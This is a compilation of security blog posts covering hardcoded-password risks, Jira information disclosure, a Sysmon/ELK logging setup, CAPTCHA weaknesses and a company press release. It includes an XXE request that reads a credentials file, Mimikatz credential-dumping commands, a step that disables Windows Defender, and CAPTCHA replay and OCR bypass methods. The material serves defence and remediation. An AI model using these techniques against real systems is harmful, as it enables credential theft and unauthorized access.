Back

Please Stop Giving Me Your Passwords

I found myself in the office on Saturday night, mainly because the frozen pizza selection is more expansive than mine at home, and I wanted to get a head start on my project for this week. It was a normal Static Application Security Test (SAST), which follows a mostly pre-defined process, with embellishments depending on the languages and frameworks at play.

The first step in that process is to search for hardcoded passwords. I dug out the simple and ugly password regex I’ve created for this and did a search for /pa?ssw?o?r?d?|pwd/gi across the entire codebase. This regex covers all of the standard ways I’ve seen “password” used as a variable name in code. Without fail I got back:

Passwordregex

After digging through all the results and parsing out the false positives I ended up with a total of 30 hardcoded passwords. All of them were database connection strings spread across 20 total users, including multiple users with admin access to the database. Our recommendation for this is simple:

Passwords should never be hardcoded in the source code.

Why?

The reasoning behind this is that there are multiple attack paths that result in source code/arbitrary file disclosure. Error messages, public Github repos, arbitrary file read, “oopsies” email attachments, and shoulder surfing being just a few.

A typical escalation path that exploits hardcoded passwords could start with an XML External Entity (XXE) Injection. An application that is vulnerable to XXE will allow us to read (almost) any file on the server. Through this an attacker will fingerprint the technology at play and target the important source code files.  For example, a web application using the Python Django framework will contain a settings.py file. This file will sometimes contain hardcoded passwords for the DB connection. With some luck/bruteforce an attacker can find the source code directory and read the settings.py file via XXE.

HTTP Request:

POST /xxe HTTP/1.1
Host: netspi.com
Connection: close

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY settings SYSTEM "file:///django-app/settings.py" >]>
<foo>&settings;</foo>

HTTP Response:

HTTP/1.1 200 OK
Content-Length: 178
Connection: close

DATABASES = {
 'default': {
 'ENGINE': 'django.db.backends.mysql',
 'NAME': 'admin',
 'USER': 'admin',
 'PASSWORD': 'password',
 'HOST': 'prod-db.netspi.com',
 'PORT': '3306',
 }
}

An attacker can now take this information and connect directly to the database, which is public-facing because someone assumed authentication was enough. Once an attacker has this amount of access, any number of paths can be followed to further infiltrate the network. This attack extends to anything that requires a password: admin pages, config pages, mail servers, etc…

Remediation

We need various forms of secrets (passwords, api keys, etc…) on the box somehow and the goal is to find the method that minimizes the organization’s risk to the greatest degree. Our suggested remediation regularly has the goal of assigning them through environmental variables on the server. Environmental variables are the recommended method due to the low likelihood of an attacker gaining access to them. I’ve only seen them exploited in two common scenarios, overly-verbose debug pages left running in prod, or using OS command execution to list all of the environmental variables*. Both of which are easily combatable in large code repositories. Environmental variables also allow a more scalable solution, as rotating secrets will only require one configuration change.

Resources

Like most things in security, except 0days, all the information is out there. A lot of people just aren’t aware of the vulnerability or what the proper way to fix it is. Because of that I won’t rehash how every platform implements environmental variables, but I will identify what I think are the best resources for doing so.

The handling of sensitive data for an app should always be done at the deployment/orchestration level. This ensures that secrets are stored and managed away from the web servers and databases. Here are some of the popular deployment and orchestration frameworks, with their related resources:

Kubernetes

Jenkins

TravisCI

Drone

TeamCity

CircleCI

GitlabCI

AWS

  • This uses IAM roles, which are not discussed in this blog, but are a stronger substitute for environmental variables in AWS applications.

Docker Swarm

  • This is an interesting method using Docker Secrets. Unfortunately they are stored in files, but are the recommended method inside of the Docker ecosystem.

In the end, secrets don’t belong in the code. Proper distribution will decrease the reach an attacker has through other methods of attack and protect an organization by allowing them to rotate secrets easily and often.

Coming Up

This blog is an attempt at describing a holistic solution to secret handling that will work in every environment. Using environmental variables is still not the most secure method, as plaintext sensitive information is available to every user on the box. To combat this a platform-specific method is usually required, which Windows and Linux both offer.

We’re curious to hear how other organizations handle secrets in their code and what improvements could be made to further advance the topic. Let us know @NetSPI or by leaving a comment below!

* Edit 10:13 AM: Unfortunately environmental variables on linux are still vulnerable to arbitrary file disclosure as seen here https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/.

Back

Jira Information Gathering

What is Jira?

Jira is a web based issue tracking and project management application that can be used to manage a wide array of information. Using Jira, organizations can design workflows to do anything from bug tracking to physical asset management. The flexibility of Jira, while great, can also lead to several issues, if it’s not configured properly.

Authorization

There are a couple of settings in Jira that, when not configured properly, may disclose information about the application and its users. This information may aid an attacker in gaining access to the application. This information disclosure is the result of an authorization misconfiguration in Jira’s Global Permissions settings. Jira uses role-based authorization where users are assigned to groups, and groups are assigned to one or more of the global permissions below.

  1. Jira System Administrators
  2. Jira Administrators
  3. Browse Users
  4. Create Shared Objects
  5. Manage Group Filter Subscriptions
  6. Bulk Changes

Configuration of global permissions is completely up to the application administrator. If they want to give Bob in accounting Jira System Administrators access, they can certainly do that. There are other less obvious configuration mistakes the results of which may be catastrophic.

Browse Users

Upon discovering an instance of Jira, one of the first things I like to do is check for anonymous access to the user picker functionality located at /secure/popups/UserPickerBrowser.jspa

Img A B C B C

The Issue

By default, it’s only accessible to authenticated users. This function is used to search for a user and assign them tasks. It is a complete list of every user’s username and email address. There are three standard user groups in Jira: Administrators, Jira Users, and Anyone. For one reason or another, an administrator may grant the ‘Anyone’ group access to this functionality. This grants anyone access to the function – even anonymous users.

The Fix

  1. Log in as a user with administrative privileges
  2. Click on the options menu at the top right of the window
  3. In the drop-down menu, Click System
  4. On the left-hand side under Security click the Global permissions link
  5. In the center screen under Jira Permissions the Browse Users permission should not contain the Anyone user group

Img A Be Aa E

Manage Filters

While not as severe, this issue is similar to the browse users issue.

Img A B E D

The Issue

This page lists the most popular filters used to categorizes issues and tasks within the application. It also lists the username of the person who ‘owns’ each of these filters. This will likely not be a complete list of users like the browse users function, but can glean useful information about how usernames are formatted. Additionally, it can give an attacker an idea of what kind of information may be housed within the application.

The Fix

  1. Log in as a user with administrative privileges
  2. Click on the options menu at the top right of the window
  3. In the drop-down menu, click System
  4. On the left-hand side under Security click the Global permissions link
  5. In the center screen under Jira Permissions, the Manage Group Filter Subscriptions permission should not contain the Anyone user group

In the end, the Anyone group should not be set on any of these global permissions. Additionally the visibility can be set on a per issue basis, and modifying this setting does not fix issues that were configured this way.

Potential Impact

I wrote a quick python script to show how easy it would be for an attacker to parse this information, which can be found here. This information would be extremely useful in a more targeted password guessing or phishing campaign. If you can compromise an administrator account, all other users are effectively compromised. It’s best to assume that, no matter the security controls in place, at some point an attacker is going to find a way in. Therefore, storing sensitive information such as usernames, passwords is not recommended.

References

  1. https://medium.flatstack.com/misconfig-in-jira-for-accessing-internal-information-of-any-company-2f54827a1cc5
  2. https://confluence.atlassian.com/adminjiraserver073/managing-global-permissions-861253290.html
Back

Windows Events, Sysmon and Elk…oh my! (Part 2)

Overview

In the previous post we walked through on how to setup an ELK instance and forward event logs using Winlogbeat. If you haven’t setup an ELK instance, I would first read the previous blog post Windows Events, Sysmon and Elk…oh my! and get an instance of ELK running. If you are just setting up ELK, don’t worry about setting up Winlogbeat as referenced in the article. We will be making specific configuration changes for Winlogbeat for forwarding events. In this post, we will be working through:

  • Setting up a log collector for Windows Event Forwarding
  • Creating a GPO to support Windows Event Forwarding
  • Creating a GPO to deploy SYSMON
  • Creating event subscriptions
  • Forwarding events using Winlogbeat to ELK
  • Generating events

Disclaimer: Prior to beginning, you should already be familiar with creating and configuring Group Policy Objects. It is also recommended that you work through the instructions referenced in a lab environment.

Environment
Much like my lab environment described in the previous post, I am running Hyper-V with two Windows 10 hosts, two Windows 2012 Servers, and an Ubuntu Server 16.04.3. I setup the Windows hosts into a small Windows Domain . I have tested the same setup with VMware Workstation and things worked just fine.

1. Log Collector Setup

I have seen several blogs describing how to setup log collectors, but probably the best article I have seen to date is Jessica Payne’s Microsoft Virtual Academy video entitled Event Forwarding and Log Analysis. I highly recommend watching the video as it will provide additional context for event forwarding. I will borrow from Jessica’s instructions and have you run the following commands from an elevated command prompt on the server you wish to be your log collector.

Set-Service -Name WINRM -StartupType Automatic
WINRM quickconfig -quiet
wecutil qc -quiet

To quickly break down what is going on, the commands setup WINRM to run on system startup, configures the machine to accept WS-Management requests, and configure the Windows Event Collector service. Surprisingly enough that is ALL that is needed to setup a Windows log collector. 

Depending on the size of your environment, you will likely need to expand the size of the Forwarded Events log. This can be done by issuing the following command from an elevated command prompt to allow the log to grow to 1 GB.

wevtutil sl forwardedevents /ms:1000000000

In a future blog post we might get into specifics about log event size and setting up custom log event buckets, but that will be outside the scope of this post. You can deep dive into this topic here:

2. Winlogbeat Setup

Links:

Winlogbeat will be used to forward collected events to the ELK instance. Download a copy of Winlogbeat and place the unzipped folder on the Desktop. Now edit the winlogbeat.yml within the Winlogbeat folder to include capturing Sysmon events, disabling Elasticsearch locally, and forwarding Logstash output to the Ubuntu Sever. The following snippets will show you what to edit.

Winlogbeat specific options – Before
winlogbeat.event_logs:
  - name: Application
    ignore_older: 72h
  - name: Security
  - name: System

We will remove all other specified log files and specify the Forwarded Events log.

Winlogbeat specific options – After
winlogbeat.event_logs:
  - name: ForwardedEvents <strong><--- Add this </strong>
Elasticsearch output – Before
output.elasticsearch:
  # Array of hosts to connect to.
  hosts: ["localhost:9200"]

  # Optional protocol and basic auth credentials.
  #protocol: "https"
  #username: "elastic"
  #password: "changeme"
Elasticsearch output – After
#output.elasticsearch: <strong><--- Comment this out </strong>
  # Array of hosts to connect to.
  # hosts: ["localhost:9200"] <strong><--- Comment this out</strong>

  # Optional protocol and basic auth credentials.
  #protocol: "https"
  #username: "elastic"
  #password: "changeme"
Logstash output – Before
#output.logstash:
  # The Logstash hosts
  #hosts: ["localhost:5044"]

  # Optional SSL. By default is off.
  # List of root certificates for HTTPS server verifications
  #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"]

  # Certificate for SSL client authentication
  #ssl.certificate: "/etc/pki/client/cert.pem"

  # Client Certificate Key
  #ssl.key: "/etc/pki/client/cert.key"
Logstash output – After
output.logstash: <strong><--- Uncomment this</strong>
  # The Logstash hosts
  hosts: ["UbunterServerIPAddressHere:5044"]<strong> <--- Uncomment this and add IP Address for your Ubuntu Server</strong>

  # Optional SSL. By default is off.
  # List of root certificates for HTTPS server verifications
  ssl.certificate_authorities: ["C:/Users/username/Desktop/winlogbeat/ELK-Stack.crt"] <strong><--- Uncomment this and add path to the ELK cert</strong>

  # Certificate for SSL client authentication
  #ssl.certificate: "/etc/pki/client/cert.pem"

  # Client Certificate Key
  #ssl.key: "/etc/pki/client/cert.key"

We now need to get a copy of the SSL certificate created during the ELK installation using PSCP.exe. The following command can be used, but you will replace the relevant areas with the correct usernames and IP address.

Links:
PSCP.EXE username@IPAddress:/etc/pki/tls/certs/ELK-Stack.crt C:\Users\Username\Desktop\winlogbeat\ELK-Stack.crt

Now we can install Winlogbeat.

Install Winlogbeat

From an administrator PowerShell prompt, navigate to the Winlogbeat folder on your desktop and issue the following commands:

powershell -Exec bypass -File .\install-service-winlogbeat.ps1
Set-Service -Name "winlogbeat" -StartupType automatic
Start-Service -Name "winlogbeat"

Now that the service is running, all events that are sent to the Forwarded Events Log will be sent to the ELK instance. First, we need to setup some GPOs and setup subscriptions to tell hosts in the domain what events we want for them to send.

3. Group Policy Objects (GPO)

GPO #1 – Event Log Forwarding

Setting up group policies is critical for our event forwarding to work correctly. The GPO we are about to setup will tell hosts in the domain where to send logs, allow the Network Service to access log data, and configure WINRM to ship off the data and run on startup.

On the domain controller, open an MMC console with the Group Policy Management snap-in console, and create a GPO entitled Event Log Forwarding. I have entitled the GPO Event Log Forwarding because I am extremely creative. Open the GPO for editing and navigate to Computer Configuration –> Policies –> Administrative Templates –> Windows Components –> Event Forwarding.

Edit to the value for Configure target Subscription Manager by selecting Enabled and click Show next to SubscriptionManagers.

In the new window that will pop up, enter the FQDN for the collector. We will also specify the time interval we want hosts to check in with the collector for subscription information. The refresh interval is in seconds, so this line will require hosts to check in every two minutes.

Server=https://&lt;FQDN of the collecter&gt;:5985/wsman/SubscriptionManager/WEC,Refresh=120

The input should end up looking similar to the screenshot below.

Apply your changes to save the configuration changes you have just made. The next configuration that we will make to this GPO is to give the Network Service user the ability to read event logs. This prevents us from having to use wevtutil to edit permissions on the log file to allow WINRM to read and send log data to the collector. Navigate to Computer Configuration –> Policies –> Windows Settings –> Restricted Groups. Right-click within the window and select Add Group.

A new window will pop open, click on Browser then on Advanced and finally on Find Now. Select the Event Log Readers group and then click the OK buttons till the Event Log Readers Propertieswindow is displayed.

From Event Log Readers Properties click on Add, and within the text box provided type or paste in the following:

NT AUTHORITY\NETWORK SERVICE

Your result should appear like the screen shot below

The last thing we will need to do for this GPO is to set WINRM to start automatically. Navigate to Computer Configuration –> Policies –> Windows Settings –> System Services. Find the Windows Remote Management service, and edit it so the Policy is defined and the radial button is set at Automatic.

Now we can begin linking the GPOs to the appropriate groups. In my Windows domain I have three OUs, Domain Controllers, Domain Servers and Domain Workstations with the appropriate hosts assigned in each. You can now link the GPO we have created to the OUs you wish to collect events from.

Since I am in a lab environment, I can easily connect to hosts within my OUs and run the command gpupdate /force to quickly apply the GPO.

GPO #2 – Sysmon
Links:

If you do not have any end point management software, deploying software can become fairly tricky. For deploying SYSMON I have opted to push it out via GPO. The goal will be to create a logon script that will pull the SYSMON binary and the SYSMON config from the SYSVOL folder then copy both locally and initiate the installation.

To prep for the GPO we need to place SYSMON, the SYSMON config, and the startup script within the SYSVOL folder on the domain controller. Yes, you could create a separate folder on a file share, but you need to ensure that the correct permissions are set on that folder so that no regular user can easily write to that location. Since the startup script launches as SYSTEM, this would provide a great way for someone to gain elevated privileges on a host if they are able to replace or backdoor the SYSMON.exe binary. You have been warned.

Within the SYSVOL folder on your Domain Controller, create a new folder entitled Sysmon. Next, download a copy of SYSMON from Microsoft and place both the Sysmon.exe and Sysmon64.exe in the newly created Sysmon folder. Grab a sample Sysmon config from Swift on Security’s GitHub page (@SwiftOnSecurity). Rename the file to Sysmonconfig.xml and make the following edits to enable us to monitor for LSASS events.

Before
<!--Sysmon EVENT ID 10 : INTER-PROCESS ACCESS [ProcessAccess]-->
   <!--EVENT 10: "Process accessed"-->
   <!--COMMENT: Can cause high system load, disabled by default.-->
   <!--COMMENT: Monitor for processes accessing other process' memory.-->
   <!--DATA: UtcTime, SourceProcessGuid, SourceProcessId, SourceThreadId, SourceImage, TargetProcessGuid, TargetProcessId, TargetImage, GrantedAccess, CallTrace-->
   <ProcessAccess onmatch="include">
   </ProcessAccess>
After
<!--Sysmon EVENT ID 10 : INTER-PROCESS ACCESS [ProcessAccess]-->
   <!--EVENT 10: "Process accessed"-->
   <!--COMMENT: Can cause high system load, disabled by default.-->
   <!--COMMENT: Monitor for processes accessing other process' memory.-->

   <!--DATA: UtcTime, SourceProcessGuid, SourceProcessId, SourceThreadId, SourceImage, TargetProcessGuid, TargetProcessId, TargetImage, GrantedAccess, CallTrace-->
   <ProcessAccess onmatch="include">
      <TargetImage condition="is">C:\Windows\system32\lsass.exe</TargetImage>
   </ProcessAccess>
   <!-- Processes that you wish to exclude -->
   <ProcessAccess onmatch="exclude">
      <SourceImage condition="is">C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe</SourceImage>
   </ProcessAccess>

Download a copy of SysmonStartup.bat and change the DC and FQDN to match your domain information. Be careful of spaces when entering the information. After you are done editing the script, pace it in the newly created Sysmon folder.

SysmonStartup.bat- Before
:: Enter the full name of the domain controller, and FQDN for the domain. 
:: Be EXTEREMLY careful of spaces!! 
:: Example: DC=dc.corp.local
:: Example: FQDN=corp.local

SET DC=
SET FQDN=
SysmonStartup.bat- After
:: Enter the full name of the domain controller, and FQDN for the domain. 
:: Be EXTEREMLY careful of spaces!! 
:: Example: DC=dc.corp.local
:: Example: FQDN=corp.local

SET DC=dc.corp.local
SET FQDN=corp.local&lt;/span

Now that we have all the files within the Sysmon folder within SYSVOL, we can now create the GPO to perform the deployment. Take the following steps to create the GPO:

  • Create a new GPO and title it SYSMON Deploy
  • Navigate to Computer Configuration –> Policies –> Windows Settings –> Scripts (Startup/Shutdown)
  • Right-click on top of Startup and select Properties.
  • In the Startup Properties window, click on Add, then on Browser and navigate to the SysmonStartup.bat
  • Click the OK buttons to save and close.
  • Lastly, linked the GPO to all the OUs you wish to deploy Sysmon to.

Just like before I will login to a host with the applied GPO and run gpupdate /force to apply the newly created Sysmon GPO. We will need to now reboot the host after we apply the GPO to get Sysmon to install. If you are impatient like me, from an administrative command prompt you can run the batch file from the SYSVOL folder on the DC to install Sysmon. You will also take this approach for installing Sysmon onto hosts that rarely reboot.

Note: You will need to either reboot a host with the applied GPO or install Sysmon manually to work through the Event Subscriptions section below.

4. Event Subscriptions

Event subscriptions are the way for the log collector to advertise to hosts which events they should be sending. A few different approaches can be taken for telling hosts within the domain which events to send. We can do a catch-all and have hosts send everything, or we can get pretty specific in telling the hosts to send send only events that match a specified criteria. To specify the criteria we will use XPath queries. XPath queries are alone their own topic of discussion and outside to scope of this article. You can use the links below to deep dive into the topic, but this article will show you how to find events related to Mimikatz and PowerShell network connections below.

To create a subscription, open an elevated MMC console on the Windows Server you have configured to be your log collector and add the Event Viewer snap-in. When prompted if you want to connect to another computer, leave the radial button selected for Local computer and proceed through the rest of the prompts.

In the far right pane within the MMC window, click on Create Subscription. In the Subscription Name field enter Mimikatz LSASS Events (0x1010 AND 0x1038). Set the destination log to be Forwarded Events. Next, select the radial for Source computer initiated then click the button for Select Computer Groups

Click on Add Domain Computers and add the group for computers you want to collect Mimikatz events for

Unfortunately we are only able to add computers using group membership and not OUs. (Q: Why is this the case? A: No freaking clue). By default in windows domains all workstations and servers are part of the Domain Computers group. At this point, you can create some group memberships and add computers or you can just choose to add Domain Computers.

After adding the group, click the OK button to close down the Computer Groups window.

In the Subscription Properties window click on Select Events then click on the XML tab.

Near the bottom of the XML tab window, select the checkbox for Edit query manually. A prompt window will open to confirm that you want to manually enter an XPath query. Click Yes to proceed.

Copy and paste the following XPath query into the text area provided for the query.

Mimikatz XPath Query
<QueryList>
  <Query Id="0" Path="Microsoft-Windows-Sysmon/Operational">
    <Select Path="Microsoft-Windows-Sysmon/Operational">
    *[System[(EventID=10)]]
    and
    *[EventData[Data[@Name='GrantedAccess'] and (Data='0x1010' or Data='0x1038')]]
</Select>
  </Query>
</QueryList>

To describe what is going on with this query, we are looking within the SYSMON event log for Event ID 10, events dealing specifically with LSASS.exe. We will then be looking for when that event data has a specific value for the GrantedAccess field. When Mimikatz dumps credentials from LSASS it will give itself access to LSASS by giving itself PROCESS_QUERY_LIMITED_INFORMATION (0x1000) and PROCESS_VM_READ (0x0010) rights. Combining both values with a bitwise OR operation we end up with a value of 0x1010. If you are curious how I came to this, read the previous blog post about this topic. So as we can see with the XPath query, we will be searching for when GrantedAccess has a value of 0x1010. Now for Pass-The-Hash events, we can search for a value of 0x1038. When Mimikatz performs its PTH operation, it gives itself PROCESS_QUERY_LIMITED_INFORMATION (0x1000), PROCESS_VM_READ (0x0010), PROCESS_VM_WRITE (0x0020) and PROCESS_VM_OPERATION (0x0008). Resulting in a combined value of 0x1038

Click Ok to save the query, and click Ok to close the Subscription Properties window.

How do we know if this subscription is working? If you right-click within the Subscriptions window and select Refresh, the field Source Computers will go from 0 to however many computers you have applied the GPO for Windows Event Forwarding to. In my case, I have 3 hosts that are currently checking in. It may take a minute or two for hosts to check in and pickup the subscription.

5. Generating Events

Link

From a host where Sysmon is installed, we will execute Mimikatz to generate events to ensure they are being collected. However, we will first need to disable Windows Defender to execute Mimikatz.

Disable Windows Defender

Open the MMC console with Administrator access and add the Local Group Policy Object snap-in console. Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender Antivirus. Change the policy for “Turn off Windows Defender Antivirus” to “Enabled” and apply the changes. After you have it disabled, check the running services and ensure that none of the Windows Defender services are running.

Mimikatz

Download a copy of Mimikatz from the link provided above and execute Mimikatz from an elevated command prompt. Once Mimikatz is running issue the following commands.

privilege::debug
token::elevate
sekurlsa::logonpasswords

Next, go to the log collector and check the Forwarded Events log file within the event viewer and see the Mimikatz event with the GrantedAccess value of 0x1010.

Now that we have generated an event, we can now open Kibana and search for these events.

6. Defining Search Indexes – ELK

Now that we have events going to the Forwarded Events log, if Winlogbeat was correctly setup then there should be events being sent to our ELK instance. However, to search these log events we need to specify the log files we want to index. Navigate to the IP address of your ELK instance and login with the credentials used during the setup process. Once logged in, click on Management in the left menu, and then select Index Patterns.

In the Index pattern text box, type in winlogbeat*. As you begin to type, Kibana will begin a search of all available indexes and will present a successful message if it sees the Winlogbeat indexes. If successful, click the Next step button.

In the drop down box under Time Filter field name select @timestamp and click the Create index pattern button.

The next page that will display will be the index pattern page showing all the fields that Kibana has currently indexed. To see the Windows events, click on Discover in the left menu.

In the search bar within the Kibana dashboard, enter the following search string:

event_id:10 AND event_data.GrantedAccess: 0x1010

Though we only have the one index, and very few events, you will see that the ELK instance has correctly indexed the log files and made the fields that we care about easily searchable! If you are not seeing any events, you might need to change the time frame for searching events by clicking on the date/time in the top right.

In the next blog post, we will get into dashboard creation within Kibana and how to make effective visualizations for greater situational awareness. We will also cover how to create additional event subscriptions for gathering more events.

References

Jessica Payne @jepayneMSFT
Event Forwarding and Log Analysis
https://mva.microsoft.com/en-US/training-courses/event-forwarding-and-log-analysis-16506

Swift on Security @SwiftOnSecurity
https://github.com/SwiftOnSecurity/Sysmon-config.git

Benjamin DELPY @gentilkiwi
https://github.com/gentilkiwi/mimikatz

Web App assessments are probably one of the most popular penetration tests performed today. These are so popular that public bug bounty sites such as Hacker One and Bug Crowd offer hundreds of programs for companies wanting to fix vulnerabilities such as XSS, SQL Injection, CSRF, etc. Many companies also host their own bounty programs for reporting web vulnerabilities to a security team. Follow us in our 4-part mini series of blog posts about web security:


CAPTCHAs (Completely Automated Public Turing test to tell Computers and Humans Apart) are an anti-automation control that are becoming more and more important in protecting forms from automated submissions. However, just because you have a CAPTCHA on your form does not mean that you “did it right”.  Let’s review some of the important parts about implementing a CAPTCHA:

Check #1: Can it be re-used?

Here’s an example we recently ran into:

Everything looks good right?  The application would not allow a user to login without solving the CAPTCHA and the CAPTCHA was difficult for a computer to guess but relatively easy for a human to solve.  Here’s a sample login POST body as captured in Burp’s Proxy:

You can see that the user’s username and password are being sent along with the CAPTCHA’s “hash” and the CAPTCHA’s solution.  If the CAPTCHA’s “hash” is stored in the back-end database as a one-time-use entry that gets deleted when the user submits this login request, everything should be fine.  In order to test this, all we need to do is repeat this request back to the server, if the server accepts the replayed CAPTCHA submission, then we know that we can reuse this CAPTCHA submission in order to brute-force guess a user’s login credentials.

(Burp Intruder was used to replay the login POST request while changing the submitted password.  The user’s password was successfully guessed on the 86th try even though we were replaying the same CAPTCHA on each request.)

In the end, this particular login portal wasn’t protecting their users from anything other than a more simplified login process.  Each user was inconvenienced by the need to solve the CAPTCHA, but an attacker could bypass the CAPTCHA by solving it once and then replaying it multiple times.  Along with having a one-time-use database entry for the CAPTCHA, the application could tie the CAPTCHA’s id to the user’s current session cookie value and ensure that each request requiring a CAPTCHA to be solved performs a lookup on the user’s session to determine which CAPTCHA the user is supposed to solve. If the request is submitted without a session cookie, or the same CAPTCHA id is replayed, the request should automatically fail.

Check #2: Do I need to solve it?

Here’s another example of a failed CAPTCHA implementation on an account registration page:

What can we notice from this example?  The new account registration page has implemented a CAPTCHA, but the form performs a check on the new account’s email address as soon as the attacker enters it into the form…no CAPTCHA solving required.  An attacker can use this unprotected functionality to brute-force the discovery of email addresses that have already registered on the site.  This particular application was using the email address as the username in their login requests (and was also using a weak password policy) so we were able to login to over a dozen separate accounts by trying a common password on our discovered email addresses.

Check #3: Is it difficult for a computer to solve?

Here are some sample CAPTCHAs taken from a recent assessment:

What sticks out about these CAPTCHAs? They seems to be using some sort of pre-defined template for letter placement (letters always in the same spot), always contain 8 characters, and only use letters of the english alphabet (26 possibilities).  OCR programs do not do very well on the character analysis for these CAPTCHAs, but with a few simple transformations, here’s some results we were able to obtain:

OCR still didn’t perform very well on these transformed CAPTCHAs (less than 2% match rate using google’s TESSARACT library) but there is another possibility open to a determined attacker: Solve the letters in each position and store them in a database to use in solving future CAPTCHAs.  A simple program can show the attacker the letter in a particular position and then store the individual letter/position combinations in a database to be matched against for all subsequent CAPTCHAs.  This would require an attacker to manually input 26 x 8 = 208 individual letter/position combinations, but then the computer could use the attacker’s stored information to solve a majority of the CAPTCHAs possible on this particular application.

Solving 208 separate character positions didn’t take more than a few minutes (although writing the code to do it took a few hours), so the payoff to an attacker would only be worth it if the CAPTCHA’d request were of high value.

Overall, the script was able to solve these CAPTCHAs with 70% accuracy. Here are some example results:

The majority of attackers wouldn’t spend the time required to solve this type of CAPTCHA unless they were protecting something pretty sensitive, so of the three bad examples we’ve shown, this was the best because the application DID require the CAPTCHA to be solved on each submission and did NOT accept replayed CAPTCHA requests. This type of CAPTCHA provides a “good enough” protection by adding in an extra layer of complexity that would prevent automated submissions by bots.

Another Transformation Example

Even though the CAPTCHAs from our first example had a flaw which made it unnecessary to solve them by OCR, here’s an example of how the CAPTCHAs could be transformed to make them easier to identify in an automated attack:

Original Image           

Transformed Image

Here’s the relevant python code used to transform the second set of CAPTCHAs:

def change_to_white(data, r, g, b):
    target_color = (red == r) & (blue == b) & (green == g)
    data[..., :-1][target_color.T] = (255, 255, 255)
    return data
im = Image.open(startimagepath)
im = im.convert('RGBA')

data = np.array(im)   # "data" is a height x width x 4 numpy array
red, green, blue, alpha = data.T # Temporarily unpack the bands for readability
colors = []
for x in range(0, len(red[0])): # Cycle through the numpy array and store individual color combinations
    for i in range(0, len(red)):
        color = (red[i][x], green[i][x], blue[i][x])
        colors.append(color)
unique_colors = set(colors) # Grab out the unique colors from the image

# Cycle through the unique colors in the image and replace all "light" colors with white
for u in unique_colors: 
    if sum(u) > 220: # Consider a color "light" if the sum of its red, green, and blue values are greater than 220
        data = change_to_white(data, u[0], u[1], u[2])

# save the new image
im2 = Image.fromarray(data)
im2.save(imagepath)

Google Solves their own reCAPTCHAs

While Google has since made improvements to their reCAPTCHAs, there was a proof of concept github project that would use Google’s Speech Recognition service to solve the audio portion of their reCAPTCHAs. Project info can be found here: https://github.com/ecthros/uncaptcha

Wrap-Up

Web application vulnerabilities continue to be a significant risk to organizations. Silent Break Security understands the offensive and defensive mindset of security, and can help your organization better prevent, detect, and defend against attackers through more sophisticated testing and collaborative remediation.

Back

NetSPI Announces New Advisory Services Focused on Threat and Vulnerability Management

NetSPI LLC, the leading security testing and vulnerability orchestration company, today announced a new professional services line delivering Threat and Vulnerability Management Program Development. This new offering expands NetSPI’s professional services and leverages the power of the NetSPI Resolve™ software platform.

As the threat landscape grows in complexity, NetSPI remains committed to helping clients solve the vulnerability management challenge. Enterprises are overwhelmed with application and infrastructure vulnerabilities and have identified the need for a solution that expands beyond technical testing. NetSPI’s solution helps customers evolve from tactical and reactive penetration testing to a proactive program that reduces risk to their business.

“Our clients are faced with a constantly changing attack surface and new emerging threats every day. We created this offering to help them build a program to quickly identify and fix the vulnerabilities most impactful to their business,” said Charles Horton, senior vice president of professional services.

While many service providers offer solutions focusing broadly on overall security strategy or narrowly focused segments of the challenge, we address vulnerability management holistically.

Deke George
CEO

NetSPI’s service is designed to help clients evaluate and understand how well they are managing technical vulnerabilities and reducing risk. Their Threat and Vulnerability Management Program Framework evaluates programs in a consistent manner, providing maturity evaluation and a roadmap for continuous improvement. NetSPI focuses on seven foundational elements that must work in concert to address the vulnerability management challenge and reduce risk:

  • Asset Management
  • Configuration Management
  • Secure Software Development
  • Vulnerability and Patch Management
  • Technical Testing
  • Threat Intelligence and Monitoring
  • Incident Response

“While many service providers offer solutions focusing broadly on overall security strategy or narrowly focused segments of the challenge, we address vulnerability management holistically,” said Deke George, NetSPI chief executive officer. “NetSPI is an industry leader in the technical testing space, and this service builds upon that expertise to better strategically serve our clients.”

To learn more about this service, more information can be found here.  On March 8, 2018 at 1:00 p.m. CST NetSPI is hosting an educational webinar on this topic and will provide attendees tools, techniques and best practices for assessing their organization’s security maturity. Register today at https://www.netsp.com/research/cybersecurity-webinars.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that support organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes program development, security testing, and a software platform for application and infrastructure vulnerability orchestration. Trusted by seven of the top 10 United States banks, two global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. NetSPI is headquartered in Minneapolis, Minnesota with additional offices in Dallas, Denver, Portland, and New York. For more information about NetSPI, please visit netspi.com.

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X